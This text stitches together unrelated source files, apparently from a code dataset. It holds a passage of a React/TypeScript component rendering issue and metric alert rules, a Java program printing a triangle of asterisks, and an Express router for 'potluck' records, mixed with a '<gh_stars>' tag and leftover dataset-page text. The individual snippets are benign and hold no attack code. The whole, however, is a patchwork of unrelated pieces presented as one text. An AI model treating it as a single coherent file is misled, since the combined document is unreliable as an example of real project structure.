  renderIssueRule(data: IssueAlertRule) {
    const {params, routes, location, canEdit} = this.props;
    // Edit link is rebuilt relative to the current route tree.
    const editLink = recreateRoute(`rules/${data.id}/`, {
      params,
      routes,
      location,
    });
    // Fall back to a catch-all label when the rule is not environment-scoped.
    const environmentName = data.environment
      ? getDisplayName({name: data.environment})
      : t('All Environments');
    return (
      <React.Fragment>
        <RuleType>{t('Issue')}</RuleType>
        <div>
          {canEdit ? <RuleName to={editLink}>{data.name}</RuleName> : data.name}
          <RuleDescription>
            {t('Environment')}: {environmentName}
          </RuleDescription>
        </div>
        <ConditionsWithHeader>
          <MatchTypeHeader>
            {tct('[matchType] of the following:', {
              matchType: data.actionMatch,
            })}
          </MatchTypeHeader>
          {data.conditions.length !== 0 && (
            <Conditions>
              {data.conditions.map((condition, i) => (
                <div key={i}>{condition.name}</div>
              ))}
            </Conditions>
          )}
        </ConditionsWithHeader>
        <Actions>
          {data.actions.map((action, i) => (
            <Action key={i}>{action.name}</Action>
          ))}
        </Actions>
      </React.Fragment>
    );
  }

  // Renders a metric rule; each trigger adds a grid row, so the type and
  // name cells must span all of them via rowSpans.
  renderMetricRule(data: SavedIncidentRule) {
    const {params, routes, location, canEdit} = this.props;
    const editLink = recreateRoute(`metric-rules/${data.id}/`, {
      params,
      routes,
      location,
    });
    const numberOfTriggers = data.triggers.length;
    return (
      <React.Fragment>
        <RuleType rowSpans={numberOfTriggers}>{t('Metric')}</RuleType>
        <RuleNameAndDescription rowSpans={numberOfTriggers}>
          {canEdit ? <RuleName to={editLink}>{data.name}</RuleName> : data.name}
          <RuleDescription />
        </RuleNameAndDescription>
        {numberOfTriggers !== 0 &&
          data.triggers.map((trigger, i) => {
            // Only the last trigger row keeps its bottom border.
            const hideBorder = i !== numberOfTriggers - 1;
            return (
              <React.Fragment key={i}>
                <Trigger key={`trigger-${i}`} hideBorder={hideBorder}>
                  <StatusBadge>{trigger.label}</StatusBadge>
                  <TriggerDescription>
                    {data.aggregate}{' '}
                    {trigger.thresholdType === 0 ? t('above') : t('below')}{' '}
                    {trigger.alertThreshold}/{data.timeWindow}
                    {t('min')}
                  </TriggerDescription>
                </Trigger>
                <Actions key={`actions-${i}`} hideBorder={hideBorder}>
                  {trigger.actions?.map((action, j) => (
                    <Action key={j}>{action.desc}</Action>
                  ))}
                </Actions>
              </React.Fragment>
            );
          })}
      </React.Fragment>
    );
  }

  render() {
    const {data} = this.props;
    // Dispatch on the discriminating type guard defined above in this file.
    return isIssueAlert(data) ? this.renderIssueRule(data) : this.renderMetricRule(data);
  }
}

export default RuleRow;
// Optional grid-row span for cells that must cover all trigger rows.
type RowSpansProp = {
  rowSpans?: number;
};

// Suppresses the bottom border between stacked trigger/action rows.
type HasBorderProp = {
  hideBorder?: boolean;
};

// Uppercase "ISSUE"/"METRIC" cell; spans extra rows for multi-trigger rules.
const RuleType = styled('div')<RowSpansProp>`
  color: ${p => p.theme.gray600};
  font-size: ${p => p.theme.fontSizeSmall};
  font-weight: bold;
  text-transform: uppercase;
  ${p => p.rowSpans && `grid-row: auto / span ${p.rowSpans}`};
`;

const RuleNameAndDescription = styled('div')<RowSpansProp>`
  ${p => p.rowSpans && `grid-row: auto / span ${p.rowSpans}`};
`;

// Rule name rendered as a router link when editable.
const RuleName = styled(Link)`
  font-weight: bold;
`;

// Shared vertical-list layout for condition and action stacks.
const listingCss = css`
  display: grid;
  grid-gap: ${space(1)};
`;

const Conditions = styled('div')`
  ${listingCss};
`;

const Actions = styled('div')<HasBorderProp>`
  font-size: ${p => p.theme.fontSizeSmall};
  ${listingCss};
  ${p => p.hideBorder && `border-bottom: none`};
`;

const Action = styled('div')`
  line-height: 14px;
`;

const ConditionsWithHeader = styled('div')`
  font-size: ${p => p.theme.fontSizeSmall};
`;

// "ANY/ALL of the following:" header above the condition list.
const MatchTypeHeader = styled('div')`
  font-weight: bold;
  text-transform: uppercase;
  color: ${p => p.theme.gray500};
  margin-bottom: ${space(1)};
`;

const RuleDescription = styled('div')`
  font-size: ${p => p.theme.fontSizeSmall};
  margin: ${space(0.5)} 0;
  white-space: nowrap;
`;

// One trigger line (badge + threshold description) in a metric rule.
const Trigger = styled('div')<HasBorderProp>`
  display: flex;
  align-items: flex-start;
  font-size: ${p => p.theme.fontSizeSmall};
  ${p => p.hideBorder && `border-bottom: none`};
`;

const TriggerDescription = styled('div')`
  white-space: nowrap;
`;

// Pill-shaped label for the trigger status (e.g. CRITICAL / WARNING).
const StatusBadge = styled('div')`
  background-color: ${p => p.theme.gray300};
  color: ${p => p.theme.gray700};
  text-transform: uppercase;
  padding: ${space(0.25)} ${space(0.5)};
  font-weight: 600;
  margin-right: ${space(0.5)};
  border-radius: ${p => p.theme.borderRadius};
  font-size: ${p => p.theme.fontSizeRelativeSmall};
`;
|
/**
 * Prints a left-aligned triangle of asterisks to stdout:
 * row r (1-based) contains exactly r stars, for 10 rows.
 */
public class StarPattern {
    public static void main(String[] args) {
        // Each of the 10 rows gets one more star than the previous one.
        for (int row = 1; row <= 10; row++) {
            // Build the whole row first, then emit it with its newline.
            StringBuilder line = new StringBuilder();
            for (int col = 0; col < row; col++) {
                line.append("*");
            }
            System.out.println(line);
        }
    }
}
<gh_stars>0
const router = require("express").Router();
const Potlucks = require("./potluck-model");

// GET / — return every potluck as JSON.
// Promise-chain form; any rejection is forwarded to the Express error handler.
router.get("/", (req, res, next) => {
  Potlucks.getAll()
    .then(potlucks => res.json(potlucks))
    .catch(next);
});

// POST / — create a potluck from the request body and echo it back with 201.
router.post("/", (req, res, next) => {
  Potlucks.add(req.body)
    .then(created => res.status(201).json(created))
    .catch(next);
});

module.exports = router;
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.